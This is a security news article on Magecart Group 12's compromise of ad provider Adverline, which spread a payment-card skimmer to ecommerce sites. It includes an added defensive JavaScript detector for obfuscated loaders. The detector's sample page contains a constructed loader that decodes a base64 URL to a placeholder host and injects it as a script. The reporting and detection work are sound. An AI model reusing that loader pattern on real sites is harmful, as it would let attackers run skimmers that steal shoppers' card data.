A new faction of the infamous Magecart cybercrime group compromised a French online advertising provider and installed a script that was then propagated to every ecommerce site that loaded code from the ad provider, an attack that could be a sign of things to come from other attack groups.
The compromise of Adverline took place at the end of December and was the work of a team that researchers from RiskIQ are calling Magecart Group 12, a group that hasn’t been documented before. Magecart is an amorphous and loosely connected network of groups that use a variety of techniques to inject a web skimmer into ecommerce and other sites in order to steal payment card information. Magecart has been in operation for at least four years and has been tied to a number of major breaches, including one at Ticketmaster UK. There are several individual groups that fall under the Magecart umbrella, and they generally have different modes of operation and targets.
“At the time of our research, the websites embedded with Adverline’s retargeting script loaded Magecart Group 12’s skimming code, which, in turn, skims payment information entered on webpages then sends it to its remote server.”
This is a much more efficient tactic for Magecart than going after each shopping cart site individually. By targeting a third party that provides resources to a wide customer base, the attackers greatly increase their potential financial rewards. Other Magecart groups have employed a similar technique in the past, targeting third-party library providers who supply plug-ins for ecommerce sites. Group 12 has put together a comprehensive attack infrastructure that allows it to deliver its malicious code directly.
“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed. Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page,” Yonathan Klijnsma, head of threat research at RiskIQ, who has been following Magecart for several years, wrote in a post on the new compromise.
“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis by performing an integrity check on itself. The actual injection script comes in two stages, which both perform a self-integrity check.”
The skimmer that Group 12 used in the compromise of Adverline performed a series of checks after installation: whether it was on a checkout page, whether certain words were present in the URL, and whether the code was running on a mobile device. All of this is designed to ensure that the skimmer is in the correct place and has a chance to do its job. Only if the script decides that it is on a suitable site does it execute the skimmer.
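The loader pattern described above (a small inline snippet that decodes a base64-encoded URL at runtime and injects it as a new script element) can be hunted for in captured page HTML. The following is an added defensive example, not code from RiskIQ, Trend Micro or the attackers; the sample page, the allow-listed hosts and the `.invalid` skimmer host are constructed placeholders, not indicators from the incident.

```javascript
// Constructed sample page: one external script, one benign inline script, and
// one loader that decodes a base64 URL with atob() and injects it as a <script>.
// The hidden host is a placeholder (.invalid TLD), not a real indicator.
const HIDDEN_URL = 'https://cdn.skimmer-placeholder.invalid/js/loader.js';
const SAMPLE_HTML = `
<html><head>
<script src="https://static.shop.example/app.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>(function(){var s=document.createElement('script');s.src=atob('${Buffer.from(HIDDEN_URL).toString('base64')}');document.head.appendChild(s);})();</script>
</head><body></body></html>`;

// Hosts the site legitimately loads scripts from (assumed allow-list).
const ALLOWED_HOSTS = new Set(['www.shop.example', 'static.shop.example']);

// Return the bodies of all inline <script> blocks in the HTML.
function inlineScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Decode every string literal passed to atob() and keep those that are URLs.
function decodedUrls(script) {
  const urls = [];
  const re = /atob\(\s*['"]([A-Za-z0-9+\/=]+)['"]\s*\)/g;
  let m;
  while ((m = re.exec(script)) !== null) {
    const text = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^https?:\/\//.test(text)) urls.push(text);
  }
  return urls;
}

// Flag inline scripts that both create a script element and decode a URL at
// runtime; report the decoded URL and host for every host not on the allow-list.
function findHiddenLoaders(html, allowed = ALLOWED_HOSTS) {
  const findings = [];
  for (const body of inlineScripts(html)) {
    if (!/createElement\(\s*['"]script['"]\s*\)/.test(body)) continue;
    for (const url of decodedUrls(body)) {
      const host = new URL(url).hostname;
      if (!allowed.has(host)) findings.push({ url, host });
    }
  }
  return findings;
}

console.log(findHiddenLoaders(SAMPLE_HTML));
```

Run over a crawler's snapshots of a site's pages, the decoded hosts become candidates for blocking and for Content Security Policy review.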
The Trend Micro team, who discovered the Adverline compromise, informed the company of the attack and Adverline was able to address the issue. The command-and-control domains involved in the attack are no longer functioning.